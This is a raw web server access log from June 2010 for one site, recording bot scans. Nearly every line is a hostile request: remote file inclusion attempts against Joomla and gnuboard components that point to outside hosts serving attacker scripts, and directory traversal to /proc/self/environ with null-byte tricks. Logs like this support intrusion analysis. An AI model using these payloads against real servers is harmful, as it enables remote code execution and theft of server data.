69.175.83.34 - - [16/Jun/2010:18:06:55 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:06:55 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:06:55 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:07:10 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:07:10 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:07:10 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:08:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:09:04 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.175.83.34 - - [16/Jun/2010:18:09:05 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:13:01 -0700] "GET /logs/access.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:17 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:27 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:33 -0700] "GET /logs/access_091105.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:15:59 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:18:18 -0700] "GET /logs/access.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:18:20 -0700] "GET /logs/access_091203.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:18:25 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:18:26 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:18:27 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.243.153 - - [16/Jun/2010:18:20:03 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.121.243.153 - - [16/Jun/2010:18:20:12 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.121.243.153 - - [16/Jun/2010:18:20:03 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:20:37 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:22:01 -0700] "GET /logs/access_100408.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:23:37 -0700] "GET /logs/access_091105.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:23:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:23:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
67.228.62.66 - - [16/Jun/2010:18:27:07 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:18:27:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [16/Jun/2010:18:27:17 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:27:33 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:29:46 -0700] "GET /logs/access_091119.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:30:22 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:34:29 -0700] "GET /logs/access_100408.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:37:43 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:37:54 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:37:45 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:38:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [16/Jun/2010:18:38:14 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://jgr1.net/showcase/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:45:11 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:45:11 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:45:01 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
206.225.86.201 - - [16/Jun/2010:18:45:01 -0700] "GET //bbs//write_update.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
206.225.86.201 - - [16/Jun/2010:18:45:02 -0700] "GET /logs///bbs//write_update.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
206.225.86.201 - - [16/Jun/2010:18:45:02 -0700] "GET /logs/access.log///bbs//write_update.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:45:13 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:45:13 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:45:03 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
111.248.162.88 - - [16/Jun/2010:18:45:40 -0700] "GET /logs/access_100401.log HTTP/1.1" 200 683885 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:45:54 -0700] "GET /logs/access_091203.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:45:45 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:18:45:49 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:47:49 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:47:40 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:47:40 -0700] "GET /logs/index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:47:43 -0700] "GET /logs/access_091126.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:47:44 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:47:44 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:47:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:47:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:48:07 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:48:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.45.45.135 - - [16/Jun/2010:18:48:36 -0700] "GET /logs/access_091015.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:52:56 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:53:13 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:53:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:53:04 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:53:15 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:53:06 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
58.86.35.4 - - [16/Jun/2010:18:53:06 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:53:51 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:55:42 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:55:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:55:53 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:55:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:56:05 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:56:15 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:18:56:15 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.23.45.80 - - [16/Jun/2010:18:56:51 -0700] "GET /logs/access_100422.log/!scanhttp://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.45.80 - - [16/Jun/2010:18:56:51 -0700] "GET /!scanhttp://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
110.45.148.160 - - [16/Jun/2010:18:58:01 -0700] "GET /logs/access_091022.log HTTP/1.0" 200 1127990 "-" "pirst; MSIE 8.0;" "www.elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:01:55 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:02:18 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:03:23 -0700] "GET /logs/access.log/index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:03:23 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:03:33 -0700] "GET /logs/index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:03:52 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:03:42 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:03:52 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
85.17.199.92 - - [16/Jun/2010:19:04:07 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:19:04:07 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.92 - - [16/Jun/2010:19:04:17 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
117.103.58.174 - - [16/Jun/2010:19:05:11 -0700] "GET /logs/access_091210.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:05:15 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:05:15 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
117.103.58.174 - - [16/Jun/2010:19:05:25 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "www.elfagr.net"
178.63.27.83 - - [16/Jun/2010:19:05:16 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
